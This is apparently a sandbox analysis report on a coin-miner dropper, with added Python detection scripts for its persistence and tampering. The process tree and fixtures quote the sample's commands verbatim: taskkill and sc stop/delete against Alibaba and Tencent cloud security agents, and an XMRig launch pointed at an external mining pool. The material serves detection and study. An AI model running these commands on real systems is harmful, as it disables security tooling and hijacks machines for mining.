Analysis

max time kernel: 120s
max time network: 121s
platform: windows10_x64
resource: win10v20210408
submitted: 04-05-2021 15:01

Static task: static1
Behavioral task: behavioral1
  Sample: 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe
  Resource: win7v20210410
Behavioral task: behavioral2
  Sample: 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe
  Resource: win10v20210408

General

Target: 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe
Size: 569KB
MD5: c85e27470e88ad0d0449ab68ef18d0a3
SHA1: 4791330c3acf353772c3d073cc52a619eb4cd7cc
SHA256: 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f
SHA512: 39bdcba7169b7b78353453ebfc72a8604272433b9bf2d043a231bec175f73a11b77bc93bcb45b85207cbafcd5c50bfa61ee0bd89314229c9b21de3ce8594ab01
Malware Config
Signatures

XMRig Miner Payload (1 IoC)
  yara rule "xmrig" matched behavioral2/memory/3976-146-0x00007FF692DA0000-0x00007FF693D0A000-memory.dmp (PID 3976, redis-server.exe)

Executes dropped EXE (2 IoCs)
  PID 824  htttp.exe
  PID 3976 redis-server.exe

Stops running service(s) (3 TTPs)

Adds Run key to start application (2 TTPs, 2 IoCs)
  htttp.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\httpd.exe = "C:\\Windows\\htttp.exe"
  htttp.exe: Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\httpd.exe = "C:\\Windows\\htttp.exe"

Drops file in Windows directory (2 IoCs)
  70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe: File created C:\Windows\htttp.exe
  70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe: File opened for modification C:\Windows\htttp.exe
Launches sc.exe
  sc.exe is a Windows utility to control services on the system; here it is used to stop and delete the cloud security agents' services (see the process tree).
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). The sandbox's generic description calls this likely ransomware behaviour; in this run the payload is an XMRig miner (see the yara hit above) and no file encryption is recorded, so read it as a heuristic rather than as evidence of ransomware.
Enumerates processes with tasklist (1 TTPs, 4 IoCs)
  tasklist.exe PIDs 516, 3772, 2180, 1016

Kills process with taskkill (10 IoCs)
  taskkill.exe PIDs 2588, 1116, 3396, 3924, 3452, 1832, 3052, 3128, 420, 3256

Suspicious use of AdjustPrivilegeToken (16 IoCs)
  SeDebugPrivilege: tasklist.exe 3772, 2180, 1016, 516; taskkill.exe 3128, 3924, 3452, 1832, 2588, 420, 3256, 1116, 3052, 3396
  SeLockMemoryPrivilege: redis-server.exe 3976 (twice). A real Redis server has no use for this privilege; XMRig enables it so it can back its scratchpad with large pages, which is a useful tell when the binary is renamed.

Suspicious use of WriteProcessMemory (64 IoCs)
  Each parent -> child pair below appears three times in the raw log (the writes a parent makes into a freshly created child), so this signature mirrors the process tree rather than showing injection. The raw list stops at the 64-IoC cap.
  736 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe -> 824 htttp.exe
  824 htttp.exe -> 3276 cmd.exe
  3276 cmd.exe -> tasklist.exe 3772, 2180, 1016, 516
  3276 cmd.exe -> taskkill.exe 3128, 3924, 3452, 1832, 2588
  3276 cmd.exe -> sc.exe 736, 2732, 2204, 3828, 1688, 1228, 2128, 2304, 1828, 500
  3276 cmd.exe -> taskkill.exe 420 (last entry before the cap)
  Note the sc.exe child with PID 736: that is the dropper's own PID, reused by Windows after the dropper exited. Correlate on a per-launch process id rather than on PID alone.
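The two Run-key writes in the signature above, run through a small triage routine. This is an added example, not sandbox output and not code from the sample: the event-line format is assumed to match the report's "Set value (type) \REGISTRY\... = data" rendering, the first two lines are the report's IoCs, the third (OneDrive) line is a constructed benign control, and the tag names are my own. It flags the value name that impersonates another program (httpd.exe pointing at htttp.exe), the binary dropped straight into C:\Windows, the WOW6432Node write that reveals a 32-bit writer, and the same target registered in both the machine and a user hive.

```python
"""Triage of Run-key writes as rendered in the sandbox report.

Added example, not sandbox output. The first two EVENTS lines are the report's
IoCs; the third is a constructed benign entry. Assumed: your telemetry renders
registry writes as "Set value (type) \\REGISTRY\\... = data".
"""
import re
from collections import defaultdict

EVENT_RE = re.compile(r"Set value \((?P<type>\w+)\) (?P<path>\\REGISTRY\\.+?) = (?P<data>.*)$")
AUTORUN_SUFFIXES = ("\\currentversion\\run", "\\currentversion\\runonce")

EVENTS = [
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\httpd.exe = "C:\\Windows\\htttp.exe"',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\httpd.exe = "C:\\Windows\\htttp.exe"',
    # constructed benign control: the value name is a label, not a program name
    r'Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background',
]


def parse_event(line):
    """Split one rendered event into hive, key, value name and target executable."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    key, _, name = m.group("path").rpartition("\\")
    if key.upper().startswith("\\REGISTRY\\MACHINE\\"):
        hive, key = "HKLM", key[len("\\REGISTRY\\MACHINE\\"):]
    elif key.upper().startswith("\\REGISTRY\\USER\\"):
        sid, _, key = key[len("\\REGISTRY\\USER\\"):].partition("\\")
        hive = "HKU\\" + sid
    else:
        hive = "?"
    data = m.group("data").replace("\\\\", "\\")  # undo the report's escaped backslashes
    exe = data[1:].split('"', 1)[0] if data.startswith('"') else data.split(None, 1)[0]
    return {"hive": hive, "key": key, "name": name, "exe": exe, "data": data}


def assess(lines):
    """Return (tag, hive, value_name, detail) findings for autorun writes."""
    findings = []
    hives_by_target = defaultdict(set)
    for e in filter(None, map(parse_event, lines)):
        if not e["key"].lower().endswith(AUTORUN_SUFFIXES):
            continue  # not a Run/RunOnce key
        exe = e["exe"].lower()
        base = exe.rsplit("\\", 1)[-1]
        # A value name that itself looks like a program but names a different binary
        # than the one launched: httpd.exe (Apache-like) -> htttp.exe in the report.
        if e["name"].lower().endswith(".exe") and e["name"].lower() != base:
            findings.append(("masquerade", e["hive"], e["name"], f"value name differs from target {base}"))
        # Executable dropped straight into C:\Windows rather than an install directory.
        if exe.startswith("c:\\windows\\") and "\\" not in exe[len("c:\\windows\\"):]:
            findings.append(("odd_location", e["hive"], e["name"], f"{e['exe']} sits directly in C:\\Windows"))
        # WOW6432Node means the writer was a 32-bit process on a 64-bit host.
        if "\\wow6432node\\" in e["key"].lower():
            findings.append(("info", e["hive"], e["name"], "written via WOW64 registry redirection (32-bit writer)"))
        hives_by_target[exe].add(e["hive"].split("\\")[0])
    # Same binary registered under both the machine and a user hive: double persistence.
    for exe, hives in hives_by_target.items():
        if {"HKLM", "HKU"} <= hives:
            findings.append(("double_persist", "HKLM+HKU", exe, "same target in machine and user Run keys"))
    return findings


if __name__ == "__main__":
    for f in assess(EVENTS):
        print(" | ".join(f))
```

The masquerade check deliberately fires only when the value name itself ends in .exe; legitimate entries such as the OneDrive control use a free-form label, so comparing every value name against the target basename would drown the signal in false positives.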
Processes

[1] C:\Users\Admin\AppData\Local\Temp\70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe
    "C:\Users\Admin\AppData\Local\Temp\70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe"
    flags: Drops file in Windows directory; Suspicious use of WriteProcessMemory

  [2] C:\Windows\htttp.exe
      "C:\Windows\htttp.exe"
      flags: Executes dropped EXE; Adds Run key to start application; Suspicious use of WriteProcessMemory

    [3] C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\run.bat" "
        flags: Suspicious use of WriteProcessMemory

      [4] C:\Windows\SysWOW64\tasklist.exe
          tasklist /FI " IMAGENAME eq Ali_update.exe"
          flags: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\tasklist.exe
          tasklist /FI " IMAGENAME eq aliyun_assist_service.exe"
          flags: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\tasklist.exe
          tasklist /FI " IMAGENAME eq aliyun_assist_update.exe"
          flags: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\tasklist.exe
          tasklist /FI " IMAGENAME eq aliyun_installer.exe"
          flags: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM aliyun_assist_service.exe
          flags: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM aliyun_assist_update.exe"
          flags: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM aliyun_installer.exe"
          flags: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM Ali_update.exe
          flags: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM AliHids.exe
          flags: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\sc.exe
          sc stop "Alibaba Security Aegis Detect Service"
      [4] C:\Windows\SysWOW64\sc.exe
          sc stop "Alibaba Security Aegis Update Service"
      [4] C:\Windows\SysWOW64\sc.exe
          sc delete "Alibaba Security Aegis Detect Service"
      [4] C:\Windows\SysWOW64\sc.exe
          sc delete "Alibaba Security Aegis Update Service"
      [4] C:\Windows\SysWOW64\sc.exe
          sc stop "BaradAgentSvc"
      [4] C:\Windows\SysWOW64\sc.exe
          sc stop "StargateSvc"
      [4] C:\Windows\SysWOW64\sc.exe
          sc stop "QPCore"
      [4] C:\Windows\SysWOW64\sc.exe
          sc delete "BaradAgentSvc"
      [4] C:\Windows\SysWOW64\sc.exe
          sc delete "StargateSvc"
      [4] C:\Windows\SysWOW64\sc.exe
          sc delete "QPCore"
      [4] C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM QQProtect.exe
          flags: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM sgagent.exe
          flags: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BaradAgent.exe
          flags: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM YDLive.exe
          flags: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM YDService.exe
          flags: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken

    [3] C:\Users\Admin\AppData\Local\Temp\redis-server.exe
        "C:\Users\Admin\AppData\Local\Temp\redis-server.exe" -o pool.fuck-jp.ru:8888 --nicehash true
        flags: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken

Reading the tree: the dropper copies itself to C:\Windows\htttp.exe and runs that copy. htttp.exe first runs run.bat, whose children are the [4] entries: tasklist/taskkill against Alibaba Cloud agents (aliyun_*, Ali_update, AliHids) and Tencent Cloud agents (BaradAgent, sgagent, YDLive, YDService) plus QQProtect, and sc stop followed by sc delete of the matching services. Only then does it start the miner, an XMRig build renamed redis-server.exe, with a stratum pool argument (-o pool.fuck-jp.ru:8888 --nicehash true). The trailing quote on two of the taskkill lines is in run.bat itself. The children run from SysWOW64 although system32\cmd.exe was requested because htttp.exe is a 32-bit process and WOW64 redirects the path, the same redirection that sends its Run-key write to WOW6432Node.
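The defense-evasion sequence and the miner launch from the tree above, expressed as detection logic over process-creation events. This is an added example, not sandbox output and not code from the sample. The EVENTS list is constructed from the report's tree (plus two benign entries as controls); the field names, the watchlists of agent services and processes, and the tag names are assumptions. Two details from the report drive the design: run.bat leaves a stray quote on some taskkill lines, so the tokenizer must tolerate unbalanced quotes, and PID 736 is reused by an sc.exe child after the dropper exits, so chains are linked on a per-launch id rather than on PID.

```python
"""Process-tree triage: security-agent tampering and coin-miner launch.

Added example, not sandbox output and not code from the sample. EVENTS is
constructed from the report's process tree plus two benign entries; the field
names (uid/puid are per-launch ids, not PIDs), watchlists and tags are assumed.
"""
import re
from collections import defaultdict

SAMPLE = "70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe"
TEMP = "C:\\Users\\Admin\\AppData\\Local\\Temp"
SYS = "C:\\Windows\\SysWOW64"

# Services and processes that run.bat stops/kills in the report (Alibaba Cloud and
# Tencent Cloud agents, QQProtect). Assumed watchlist; extend it for your estate.
AGENT_SERVICES = {
    "alibaba security aegis detect service", "alibaba security aegis update service",
    "baradagentsvc", "stargatesvc", "qpcore",
}
AGENT_PROCESSES = {
    "ali_update.exe", "aliyun_assist_service.exe", "aliyun_assist_update.exe",
    "aliyun_installer.exe", "alihids.exe", "qqprotect.exe", "sgagent.exe",
    "baradagent.exe", "ydlive.exe", "ydservice.exe",
}
POOL_RE = re.compile(r"^[\w.-]+:\d{2,5}$")   # host:port as passed to -o
TOKEN_RE = re.compile(r'"([^"]*)"?|(\S+)')   # survives the stray quotes in run.bat


def tokenize(cmdline):
    """Windows-style argv split that tolerates unbalanced quotes."""
    out = []
    for m in TOKEN_RE.finditer(cmdline):
        tok = m.group(1) if m.group(1) is not None else m.group(2).strip('"')
        if tok:
            out.append(tok)
    return out


def classify(event):
    """Return (tag, detail) findings for one process-creation event."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    argv = tokenize(event["cmdline"])
    findings = []
    if image == "taskkill.exe":
        for i, tok in enumerate(argv[:-1]):
            if tok.upper() == "/IM" and argv[i + 1].lower() in AGENT_PROCESSES:
                findings.append(("agent_tamper", f"taskkill {argv[i + 1]}"))
    elif image == "sc.exe" and len(argv) >= 3:
        verb, svc = argv[1].lower(), argv[2]
        if verb in ("stop", "delete", "config") and svc.lower() in AGENT_SERVICES:
            findings.append(("agent_tamper", f"sc {verb} {svc}"))
    elif image == "tasklist.exe":
        # tasklist /FI " IMAGENAME eq X" is the recon step that precedes each kill.
        for i, tok in enumerate(argv[:-1]):
            if tok.upper() != "/FI":
                continue
            m = re.search(r"imagename\s+eq\s+(\S+)", argv[i + 1], re.I)
            if m and m.group(1).lower() in AGENT_PROCESSES:
                findings.append(("agent_recon", f"tasklist filter {m.group(1)}"))
    # Miner indicators are checked whatever the image is called: XMRig here runs as redis-server.exe.
    if "-o" in argv:
        nxt = argv.index("-o") + 1
        if nxt < len(argv) and POOL_RE.match(argv[nxt]):
            findings.append(("miner_cli", f"pool {argv[nxt]}"))
    if any(a.lower() == "--nicehash" for a in argv):
        findings.append(("miner_cli", "--nicehash"))
    if image == "redis-server.exe" and "\\temp\\" in event["image"].lower():
        findings.append(("masquerade", "redis-server.exe launched from a Temp directory"))
    return findings


def ev(uid, puid, pid, image, cmdline):
    return {"uid": uid, "puid": puid, "pid": pid, "image": image, "cmdline": cmdline}


EVENTS = [  # constructed from the report's tree; uid/puid are per-launch ids
    ev(1, 0, 736, f"{TEMP}\\{SAMPLE}", f'"{TEMP}\\{SAMPLE}"'),
    ev(2, 1, 824, "C:\\Windows\\htttp.exe", '"C:\\Windows\\htttp.exe"'),
    ev(3, 2, 3276, f"{SYS}\\cmd.exe", f'C:\\Windows\\system32\\cmd.exe /c ""{TEMP}\\run.bat" "'),
    ev(4, 3, 3772, f"{SYS}\\tasklist.exe", 'tasklist /FI " IMAGENAME eq aliyun_assist_service.exe"'),
    ev(5, 3, 3128, f"{SYS}\\taskkill.exe", "taskkill /F /IM aliyun_assist_service.exe"),
    ev(6, 3, 3924, f"{SYS}\\taskkill.exe", 'taskkill /F /IM aliyun_assist_update.exe"'),  # stray quote as in run.bat
    ev(7, 3, 736, f"{SYS}\\sc.exe", 'sc stop "Alibaba Security Aegis Detect Service"'),  # PID 736 reused
    ev(8, 3, 2732, f"{SYS}\\sc.exe", 'sc delete "BaradAgentSvc"'),
    ev(9, 2, 3976, f"{TEMP}\\redis-server.exe", f'"{TEMP}\\redis-server.exe" -o pool.fuck-jp.ru:8888 --nicehash true'),
    ev(10, 0, 4000, f"{SYS}\\sc.exe", 'sc query "Spooler"'),                 # benign control
    ev(11, 0, 4004, f"{SYS}\\taskkill.exe", "taskkill /F /IM notepad.exe"),  # benign control
]


def triage(events):
    """Attribute findings to the root of each launch chain, keyed on uid rather than
    PID: the report shows PID 736 reused by an sc.exe child once the dropper exited."""
    by_uid = {e["uid"]: e for e in events}

    def root_of(uid):
        while by_uid[uid]["puid"] in by_uid:
            uid = by_uid[uid]["puid"]
        return uid

    report = defaultdict(list)
    for e in events:
        for tag, detail in classify(e):
            report[root_of(e["uid"])].append((tag, e["pid"], detail))
    return dict(report)


if __name__ == "__main__":
    for root, items in triage(EVENTS).items():
        print(f"chain rooted at uid {root}:")
        for tag, pid, detail in items:
            print(f"  {tag:<13} pid {pid:<5} {detail}")
```

Run stand-alone it prints one chain, rooted at the dropper, carrying four agent_tamper findings, one agent_recon, two miner_cli and one masquerade; the two benign controls produce nothing. Correlating on the chain rather than on single events matters here because each individual taskkill or sc stop is something an administrator might also type; the combination of recon, kill, service deletion and a pool argument under one parent is what makes the verdict.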
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\Local\Temp\redis-server.exe
  MD5: 0c4ae60bb07bd7c084ca66b844fa0b4b
  SHA1: ff2dbcdc44b7192e26a2a2ec32eb90a105a0db80
  SHA256: 31cf37437a844eada2afd9c76a8f3b7f51f7b7d2e8bf87eea56beb5df6f1975e
  SHA512: 5dc775a7f7e38ab77b85cc5484c767d888ce30c2373a1df6f5a1d239c99d2513f72ff2810b44315c47eb945f5c13d80dbf073e971cde29bf4675a8c0d5ced74d

C:\Users\Admin\AppData\Local\Temp\run.bat
  MD5: f1cc668d01eeb779b1fc1044541fc1d4
  SHA1: 45bd782881b31eb2868fc211b19af2cb627a9d0d
  SHA256: 62fdc9b8581a931ac987446ab4c8547bb9f94d9caf8e61c3d0d95ec033e73929
  SHA512: 293263607a850f2bb6873924b6606b83c7ea0dbd9fa07c0d8958be9e64aa1b27e24a0cf213b89906b3919c32da3c265d3ae9df07430ab4441b7289b3e935c33e

C:\Windows\htttp.exe (hashes identical to the submitted sample: the dropper copies itself into C:\Windows)
  MD5: c85e27470e88ad0d0449ab68ef18d0a3
  SHA1: 4791330c3acf353772c3d073cc52a619eb4cd7cc
  SHA256: 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f
  SHA512: 39bdcba7169b7b78353453ebfc72a8604272433b9bf2d043a231bec175f73a11b77bc93bcb45b85207cbafcd5c50bfa61ee0bd89314229c9b21de3ce8594ab01

Memory dumps (mapping dumps for every spawned PID; the PID 3976 region dumps belong to redis-server.exe, and the 15.4MB one is the image the xmrig yara rule matched)
  memory/420-138-0x0000000000000000-mapping.dmp
  memory/500-137-0x0000000000000000-mapping.dmp
  memory/516-122-0x0000000000000000-mapping.dmp
  memory/736-128-0x0000000000000000-mapping.dmp
  memory/824-114-0x0000000000000000-mapping.dmp
  memory/1016-121-0x0000000000000000-mapping.dmp
  memory/1116-140-0x0000000000000000-mapping.dmp
  memory/1228-133-0x0000000000000000-mapping.dmp
  memory/1688-132-0x0000000000000000-mapping.dmp
  memory/1828-136-0x0000000000000000-mapping.dmp
  memory/1832-126-0x0000000000000000-mapping.dmp
  memory/2128-134-0x0000000000000000-mapping.dmp
  memory/2180-120-0x0000000000000000-mapping.dmp
  memory/2204-130-0x0000000000000000-mapping.dmp
  memory/2304-135-0x0000000000000000-mapping.dmp
  memory/2588-127-0x0000000000000000-mapping.dmp
  memory/2732-129-0x0000000000000000-mapping.dmp
  memory/3052-141-0x0000000000000000-mapping.dmp
  memory/3128-123-0x0000000000000000-mapping.dmp
  memory/3256-139-0x0000000000000000-mapping.dmp
  memory/3276-117-0x0000000000000000-mapping.dmp
  memory/3396-142-0x0000000000000000-mapping.dmp
  memory/3452-125-0x0000000000000000-mapping.dmp
  memory/3772-119-0x0000000000000000-mapping.dmp
  memory/3828-131-0x0000000000000000-mapping.dmp
  memory/3924-124-0x0000000000000000-mapping.dmp
  memory/3976-143-0x0000000000000000-mapping.dmp
  memory/3976-146-0x00007FF692DA0000-0x00007FF693D0A000-memory.dmp  15.4MB  (xmrig yara match)
  memory/3976-147-0x0000026DE0D50000-0x0000026DE0D70000-memory.dmp  128KB
  memory/3976-148-0x0000026DE0D80000-0x0000026DE0DA0000-memory.dmp  128KB
  memory/3976-149-0x0000026DE2820000-0x0000026DE2840000-memory.dmp  128KB
  memory/3976-150-0x0000026DE2840000-0x0000026DE2860000-memory.dmp  128KB